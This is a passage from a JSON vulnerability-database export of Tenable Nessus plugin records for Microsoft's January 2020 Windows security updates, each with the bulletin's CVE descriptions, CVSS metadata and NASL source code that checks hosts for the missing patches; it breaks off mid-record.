(CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. 
An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\");\n # https://support.microsoft.com/en-us/help/4534310/windows-7-update-kb4534310\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5bc50ca4\");\n # https://support.microsoft.com/en-us/help/4534314/windows-7-update-kb4534314\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8d29d5dd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4534314 or Cumulative Update KB4534310.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are 
available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534310', '4534314');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, 
share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534310, 4534314])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:32:48", "description": "The remote Windows host is missing security update 4534288\nor cumulative update 4534283. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an\n unauthenticated attacker connects to the target system\n using RDP and sends specially crafted requests. This\n vulnerability is pre-authentication and requires no user\n interaction. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on the target\n system. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists when\n Remote Desktop Web Access improperly handles credential\n information. An attacker who successfully exploited this\n vulnerability could obtain legitimate users'\n credentials. (CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. 
(CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the user's\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. 
An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. 
(CVE-2020-0644)", "edition": 10, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "title": "KB4534288: Windows Server 2012 January 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0609", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0615", "CVE-2020-0637", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0629", "CVE-2020-0610", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0605", "CVE-2020-0608"], "modified": "2020-01-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534283.NASL", "href": "https://www.tenable.com/plugins/nessus/132861", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132861);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/26\");\n\n script_cve_id(\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0609\",\n \"CVE-2020-0610\",\n \"CVE-2020-0611\",\n \"CVE-2020-0615\",\n \"CVE-2020-0620\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0637\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"MSKB\", value:\"4534288\");\n script_xref(name:\"MSKB\", value:\"4534283\");\n script_xref(name:\"MSFT\", value:\"MS20-4534288\");\n script_xref(name:\"MSFT\", value:\"MS20-4534283\");\n\n script_name(english:\"KB4534288: Windows Server 2012 January 2020 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534288\nor cumulative update 4534283. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an\n unauthenticated attacker connects to the target system\n using RDP and sends specially crafted requests. This\n vulnerability is pre-authentication and requires no user\n interaction. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on the target\n system. 
An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists when\n Remote Desktop Web Access improperly handles credential\n information. An attacker who successfully exploited this\n vulnerability could obtain legitimate users'\n credentials. (CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. 
An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. 
An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. 
An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\");\n # https://support.microsoft.com/en-us/help/4534288/windows-server-2012-update-kb4534288\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?00a24f59\");\n # https://support.microsoft.com/en-us/help/4534283/windows-server-2012-update-kb4534283\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?27812eb5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4534288 or Cumulative Update KB4534283.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534288', '4534283');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534288, 4534283])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:32:48", "description": "The remote Windows host is missing security update 4534309\nor cumulative update 4534297. 
It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - A remote code execution vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an\n unauthenticated attacker connects to the target system\n using RDP and sends specially crafted requests. This\n vulnerability is pre-authentication and requires no user\n interaction. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on the target\n system. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. 
(CVE-2020-0642)\n\n - An information disclosure vulnerability exists when\n Remote Desktop Web Access improperly handles credential\n information. An attacker who successfully exploited this\n vulnerability could obtain legitimate users'\n credentials. (CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the user's\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. 
(CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. 
(CVE-2020-0644)", "edition": 11, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "title": "KB4534309: Windows 8.1 and Windows Server 2012 R2 January 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0609", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0637", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0629", "CVE-2020-0610", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0608"], "modified": "2020-01-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534297.NASL", "href": "https://www.tenable.com/plugins/nessus/132863", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132863);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/07\");\n\n script_cve_id(\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0609\",\n \"CVE-2020-0610\",\n \"CVE-2020-0611\",\n \"CVE-2020-0613\",\n \"CVE-2020-0614\",\n \"CVE-2020-0615\",\n \"CVE-2020-0620\",\n \"CVE-2020-0623\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0637\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\"\n );\n script_xref(name:\"MSKB\", value:\"4534297\");\n script_xref(name:\"MSKB\", value:\"4534309\");\n script_xref(name:\"MSFT\", value:\"MS20-4534297\");\n script_xref(name:\"MSFT\", value:\"MS20-4534309\");\n script_xref(name:\"IAVA\", value:\"2020-A-0026\");\n\n script_name(english:\"KB4534309: Windows 8.1 and Windows Server 2012 R2 January 2020 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534309\nor cumulative update 4534297. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. 
(CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - A remote code execution vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an\n unauthenticated attacker connects to the target system\n using RDP and sends specially crafted requests. This\n vulnerability is pre-authentication and requires no user\n interaction. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on the target\n system. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - An information disclosure vulnerability exists when\n Remote Desktop Web Access improperly handles credential\n information. An attacker who successfully exploited this\n vulnerability could obtain legitimate users'\n credentials. 
(CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log 